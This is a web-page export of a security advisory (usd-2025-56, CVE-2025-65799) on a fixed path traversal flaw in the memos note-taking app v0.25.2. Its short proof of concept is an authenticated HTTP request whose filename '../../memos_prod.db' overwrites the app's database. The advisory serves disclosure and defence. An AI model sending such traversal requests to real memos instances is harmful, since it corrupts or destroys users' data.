{"id":24607,"date":"2025-12-05T12:48:17","date_gmt":"2025-12-05T11:48:17","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=24607"},"modified":"2025-12-10T14:41:59","modified_gmt":"2025-12-10T13:41:59","slug":"usd-2025-0056","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2025-0056\/","title":{"rendered":"usd-2025-0056"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.21.0\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_row _builder_version=\"4.25.2\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_column type=\"4_4\" _builder_version=\"4.21.0\" _module_preset=\"default\" global_colors_info=\"{}\" theme_builder_area=\"post_content\"][et_pb_text _builder_version=\"4.27.4\" _module_preset=\"default\" custom_padding=\"||13px|||\" hover_enabled=\"0\" global_colors_info=\"{}\" theme_builder_area=\"post_content\" sticky_enabled=\"0\"]<\/p>\n

usd-2025-56 | Arbitrary File Write via Path Traversal in memos<\/h1>\n

<\/h1>\n

Product<\/strong>: memos
Affected Version<\/strong>: v0.25.2
Vulnerability Type<\/strong>: CWE-23: Relative Path Traversal
Security Risk<\/strong>: High
Vendor<\/strong>: usememos
Vendor URL<\/strong>: https:\/\/github.com\/usememos\/memos<\/a>
Vendor acknowledged vulnerability<\/strong>: Yes
Vendor Status<\/strong>: Fixed
CVE Number<\/strong>: CVE-2025-65799
CVE Link<\/strong>: https:\/\/www.cve.org\/CVERecord?id=CVE-2025-65799<\/a>
Advisory ID<\/strong>: usd-2025-56<\/p>\n

Description<\/h3>\n

Memos is a lightweight, self-hosted knowledge management and note-taking platform designed for personal use. The architecture features a Go backend paired with a React+Vite frontend, using gRPC for internal communication and providing REST API access through gRPC-Gateway. It supports multiple database backends (SQLite, MySQL, PostgreSQL) and includes features like file attachments, OAuth\/SSO integration, activity logging, and internationalization.<\/p>\n

When local storage is used for attachments, provided filenames are neither verified nor sanitized, allowing path traversal. This allows authenticated, low-privileged attackers to overwrite arbitrary files with chosen content. For example, if SQLite is used as database backend, an attacker can corrupt the database.<\/p>\n

Proof of Concept<\/h3>\n

The following HTTP request uses the REST API to demonstrate the vulnerability.<\/p>\n

\n
<\/span>POST<\/span> \/api\/v1\/attachments<\/span> HTTP<\/span>\/<\/span>1.1<\/span>\nHost<\/span>:<\/span> memos:5230<\/span>\nContent-Type<\/span>:<\/span> application\/json<\/span>\nCookie<\/span>:<\/span> user_session=[... REDCATED ...]<\/span>\nContent-Length<\/span>:<\/span> 59<\/span>\n\n{<\/span>\n    <\/span>\"filename\"<\/span>:<\/span>\"Test\/..\/..\/memos_prod.db\"<\/span>,<\/span>\n    <\/span>\"type\"<\/span>:<\/span>\"image\/png\"<\/span>\n}<\/span>\n<\/pre>\n<\/div>\n
Note that for a full deletion of the database, the memos_prod.db-wal<\/strong> file must be overwritten as well.<\/p>\n
Fix<\/h3>\n
A fix for the vulnerability has been submitted as pull request<\/a>.<\/p>\n
References<\/h3>\n